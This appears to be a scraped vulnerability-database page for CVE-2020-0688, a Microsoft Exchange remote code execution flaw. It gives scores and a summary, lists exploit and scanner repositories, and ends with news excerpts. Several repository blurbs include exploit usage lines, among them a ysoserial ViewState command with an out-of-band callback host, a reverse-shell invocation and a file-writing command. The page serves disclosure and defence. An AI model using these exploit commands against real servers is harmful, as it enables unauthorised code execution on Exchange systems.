8.8
CVSSv3

CVE-2020-0688

Published: 11/02/2020 Updated: 13/02/2024
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 924
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

microsoft exchange server 2010

Exploits

# Exploit Title: Microsoft Exchange 2019 15222112 - Authenticated Remote Code Execution # Date: 2020-02-28 # Exploit Author: Photubias # Vendor Advisory: [1] portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-0688 # [2] wwwthezdicom/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsof ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'bindata' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager D ...
This Metasploit module exploits a NET serialization vulnerability in the Exchange Control Panel (ECP) web page The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values With knowledge of these, values an attacker can craft a s ...
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfodll with a malicious DLL containing the attacker's payload To achieve code execution as the SYSTEM user, the Update Session Orchestrat ...
Microsoft Exchange 2019 version 15222112 suffers from an authenticated remote code execution vulnerability ...

Github Repositories

SMBMap is a handy SMB enumeration tool

SMBMap SMBMap allows users to enumerate samba share drives across an entire domain List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large netw

ViperX Offensive Security

ViperX Research labs Presentations | 0-days/CVE's | Articles | More+ Dear Colleagues and Partners, We are pleased to announce the establishment of the ViperX Research Labs Repository, a significant initiative aimed at advancing the field of cybersecurity through collaborative and transparent research Our decision to create this repository stems from a deep understanding

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

CVE-2020-0688 modified exploit for Exchange 2010

The main issue with Exchange2010 that it's net 20 based and generic deserialization gadgets do not work All credits goes to zcgonvh and EazyLov3 The project is just a combination of: githubcom/zcgonvh/CVE-2020-0688/ wwwbuaqnet/go-41757html How to execute: compile run Exch2010exe 19216868110 domain\user P@ssw0rd run ExchangeCmdexe 19216868

GUI Exploit Tool for CVE-2020-0688

CVE-2020-0688-GUI GUI Exploit Tool for CVE-2020-0688

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. This cheat sheet is inspired by the PayloadAllTheThings repo.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Notepad Todo lo que tengo pendiente por revisar maquina Tally # Nmap 794 scan initiated Tue Jan 16 22:11:14 2024 as: nmap -sCV -p21,80,135,139,445,808,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -vvv -oN Scan 101291183 Nmap scan report for 101291183 Host is up, received echo-reply ttl 127 (031s latency) Scanned at 2024-01-16 22:11:15 EST fo

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and Versions discovered The specified IP/range/CIDR will be scanned with masscan on port tcp/443 After a successful scan it tries to HTTP GET "/owa/auth/logonaspx" with curl to grab the Outlook Web Access page source for build versions to display On Small Business S

cve-2020-0688

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Windows-Active-Directory-Cheatsheet A cheatsheet in order to help during intrusion steps on Windows environment Summary Tools Enumeration Pre auth Find valid users Find valid credentials AS REP Roast Responder Leak NetNTLM Hashes Post auth Domain info Powerview Bloodhound Ldeep SPNs Privelege Escalation PowerUp WinPeas FullPower PrintSpoofer Potatoes DNS Admin A

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell Usage This PoC requires a valid Username and Password This PoC uses ysoserialnet to create the new ViewState which contains the command you specified on the -Command param If you don't already have this installed on your system download it here PS> \PSForgot2kEyXCHANGEps1 PS&

"Powershell script assisting with domain enumerating and in finding quick wins" - Basically written while doing the 'Advanced Red Team' lab from pentesteracademy.

Invoke-Recon Powershell script as a first big step for AD enumeration Quickwins focused Because typing the same Powershell commands over and over is tedious Prerequisites Git clone and run: git clone --recurse-submodules githubcom/phackt/Invoke-Recongit && cd \Invoke-Recon \Invoke-Reconps1 -Domain usfuncorplocal | Tee-Object -FilePath \usfunc

Red Team Cheatsheet in constant expansion.

Red Team Techniques Initial Access Techniques (soon) Code Execution Techniques (soon) Lateral Mouvement Techniques (soon) Evasion Techniques (soon) Persistence Techniques (soon) Privilege Escalation Techniques (soon) Credential Dumping Techniques (soon) Pivoting Techniques (soon) Windows Protocols and Terminologies Windows Protocols and Terminologies Guide (soon) Miscs O

cve-2020-0688

cve-2020-0688 cve-2020-0688 Login with a user with an email address privliage is nothing to worry about Grab - __VIEWSTATEGENERATOR from page source Grab - the value of ASPNET_SessionId cookie for viewstateuserkey value Download YSO Here ysoserialexe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdasmyburpcollabnet" --validationalg="SHA1"

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance Usage scan - provide credentials and target information to obtain cookies required for exploitation and saves them to 'cookiestxt' Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

Exploit and detect tools for CVE-2020-0688

Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability) build csc ExchangeCmdcs csc ExchangeDetectcs usage ExchangeDetect <target> <user> <pass> ExchangeCmd <target> <user&

Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.

CVE-2020-0688-Scanner Quick C# tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method Features Scan hosts from an input file Passive check : grab exchange version by scraping html content Produces an output file Demo How to use Prerequisite Windows NET framework 452 Download git clone githubcom/onSec-fr/CVE-2020-0688-Scannergit

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description A tool for generating NET serialized gadgets that can trigger NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts The current gadget triggers a call to ActivatorCreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba, this means it can be used to trigger execution of your NET assembly of choice

Vulnerability scanner for CVE-2020-0688

Identify Exchange Servers vulnerable to CVE-2020-0688 CVE-2020-0688 is a critical vulnerability in Microsoft Exchange due to use of static keys Although exploitation requires valid credentials (at an email user level) and the risk of mass-exploitation is low, this vulnerability might be very useful in targeted attacks as it leads to SYSTEM level RCE More information: https:/

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability

CVE-2020-0688 CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability Installation Instruction: Download using git (Requires git): git clone githubcom/7heKnight/CVE-2020-0688 Download Zip File: githubcom/7heKnight/CVE-2020-0688/archive/refs/heads/mainzip pip install urllib3 requests Usage: python pocpy -s <Server/ip&

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXPpy -h usage: CVE-2020-0688_EXPpy [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting heade

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE) Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in webconfig Thus, an authenticated attacker can trick the server into deserializing maliciously crafted ViewSta

C Sharp codes of my blog.

Homework-of-C-Sharp C Sharp codes of my blog Shellcodecs Use CreateThread to run shellcode ShellcodeBase64txt Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calcexe EXITFUNC=thread -f csharp) ReadShellcodecs It will read ShellcodeBase64txt and launch the shellcode DumpLsasscs Source code is githubcom/GhostPack/SafetyKatz Remove some functions of th

Proxylogon

Proxylogon-106370718 Proxylogon 事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻擊事故。   嚴重性: 全球企業普遍使

Cyber Crime and Forensics course

CCF - Cyber Crime and Forensics course: Incident response on cyber incidents: Acquisition and netwok analysis: Wireshark, Brim File system and OS artifacts analysis: AccessData FTK, Autopsy, Event Log Explorer Memory analysis: Capa, volatility Sandboxing and static analysis of malware: Anyrun, hybrid analysis, cuckoo sandbox, ghidra, IDA, Windbg Nobelium APT SolarWinds Inci

CVE-2020-0688 - Exchange

python3 CVE-2020-0688py mailchinabaikercom username@domaincom password command

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell Tested using Python27 To Install: pip install -r requirementstxt To Run: python CVE-2020-0688-POCpy 1016124 -lhost 10111 -lport 4444

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly It helps to improve checking the vuln, reducing hugely steps for that Modify these inputs before running the file url = "mailsomethingcom" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtntxt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977&

justtest

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Exchange学习 整理和自己写了一些exchange的脚本 CheckInfo 基于exchange版本和补丁日期检测漏洞 版本识别 通过 owa 接口,获取短版本信息 通过 /ecp/Current/exporttool/microsoftexchangeediscoveryexporttoolapplication 接口获取完整版本信息 通过 /owa/service, /owa 接口响应头 X-OWA-Version获取完整版本 爆破 /ec

Exchange Scanner CVE-2020-0688

CVE-2020-0688 Scanner This is a little dirty Script to Check for vulnerables Exchange Servers by CVE-2020-0688 It's written ugly and in PHP Caution: It only checks if you have the actual CU update installed That doesn't mean that you have installed the bugfix patch! Requirements You need php-cli and php-curl Usage First clone the repo: git clone githubcom/r

CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting heade

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB How to install Not much to do, you just have to clone the repo and install the required python libraries git clone githubcom/horshark/akb-explorer/ pip install -r requirementstxt Then you need to add your AKB API key in config/apitxt You can retrive it from your AKB profil

cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output

Exchange Remote Code Execution (cve-2020-0688) - RED TEAM [MODE ON] require: python3+ [UNIVERSAL] Python implementation for (cve-2020-0688), utilizing ASPX webshell for custom command output This just a POC to facilitate vulnerability demostrations for security reasons I disapprove every illegal actions, and i'm not responsible for any actions what this script does

Red Team Cheatsheet in constant expansion.

Red Team Techniques Initial Access Techniques (soon) Code Execution Techniques (soon) Lateral Mouvement Techniques (soon) Evasion Techniques (soon) Persistence Techniques (soon) Privilege Escalation Techniques (soon) Credential Dumping Techniques (soon) Pivoting Techniques (soon) Windows Protocols and Terminologies Windows Protocols and Terminologies Guide (soon) Miscs O

Homework-of-C-Sharp C Sharp codes of my blog Shellcodecs Use CreateThread to run shellcode ShellcodeBase64txt Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calcexe EXITFUNC=thread -f csharp) ReadShellcodecs It will read ShellcodeBase64txt and launch the shellcode DumpLsasscs Source code is githubcom/GhostPack/SafetyKatz Remove some functions of th

CrypeAlbatros is a handy SMB enumeration tool. An Offensive tool to Scan & Exploit vulnerabilities in Microsoft Windows over the Samba protocol.

CrypeAlbatros CrypeAlbatros allows users to enumerate samba share drives across an entire domain List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data acr

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ gistgithubcom/N4kedTurtle/823

RedTeam参考,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取

RedTeam参考,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取

Recent Articles

Microsoft Patch Tuesday – February 2020
Symantec Threat Intelligence Blog • Preethi Koroth • 12 Feb 2024

This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

Posted: 12 Feb, 202024 Min ReadThreat Intelligence SubscribeMicrosoft Patch Tuesday – February 2020This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical. As always, customers are advised to follow these security best practices: Install vendor patches as soon as they are available. Run all software with the least privileges required...

Android banking malware sharply increased in the first chunk of 2021, reckons ESET
The Register • Gareth Corfield • 04 Jun 2021

Claims Russia's FSB was poking around an Eastern European ministry

While enterprises stagger under sustained ransomware attacks, Android users are increasingly being targeted by banking malware, with Slovakian infosec firm ESET reckoning it had seen a 159 per cent increase in such malicious software over the last few months. Even though banking malware aimed at users of the Google mobile OS sharply increased in popularity overall mobile threat detections on the Google-owned operating system declined by 18.8 per cent quarter-on-quarter, said ESET. “Android Ban...

What do F5, Citrix, Pulse Secure all have in common? China exploiting their flaws to hack govt, biz – Feds
The Register • Shaun Nichols in San Francisco • 14 Sep 2020

Beijing's snoops don't even need zero-days to break into valuable networks

The US government says the Chinese government's hackers are preying on a host of high-profile security holes in enterprise IT equipment to infiltrate Uncle Sam's agencies and American businesses. Yes, this sounds like something from the Department of the Bleeding Obvious – spies do spying on all sides, and all that – but what's interesting in this latest warning is the roll call of vulnerable products being targeted. In a joint statement, the FBI and Homeland Security's Cybersecurity and Inf...

Enjoyed the US Labor Day weekend? Because it's September 2020 and Exchange Server can be pwned via email
The Register • Shaun Nichols in San Francisco • 08 Sep 2020

Don't be so smug, Mac users, you're open to an InDesign project file

A nightmare flaw for Exchange Server headlines this month's Patch Tuesday lineup from Microsoft and others. September sees a bundle of 129 CVE-listed flaws patched by Microsoft. The vast majority of those, 105 in total, are classified as 'important' risks. Another 23 are considered critical bugs, and one is listed as moderate. None of the bugs have public exploit code or in-the-wild attacks yet. Of the nearly two-dozen critical patches, Zero Day Initiative's Dustin Childs says that far and away ...

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focus...

If you're running Windows, I feel bad for you, son. Microsoft's got 99 problems, better fix each one
The Register • Shaun Nichols in San Francisco • 11 Feb 2020

Meanwhile, we're still squashing bugs in Adobe Flash Player... plus stuff from Intel and SAP

Patch Tuesday It's going to be a busy month for IT administrators as Microsoft, Intel, Adobe, and SAP have teamed up to deliver a bumper crop of security fixes for Patch Tuesday. Microsoft had one of its largest patch bundles in recent memory, as the Windows giant released fixes for 99 CVE-listed vulnerabilities. These included CVE-2020-0674, a remote code execution flaw in Internet Explorer's Trident rendering engine that is already being exploited in the wild. This hole would typically be expl...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...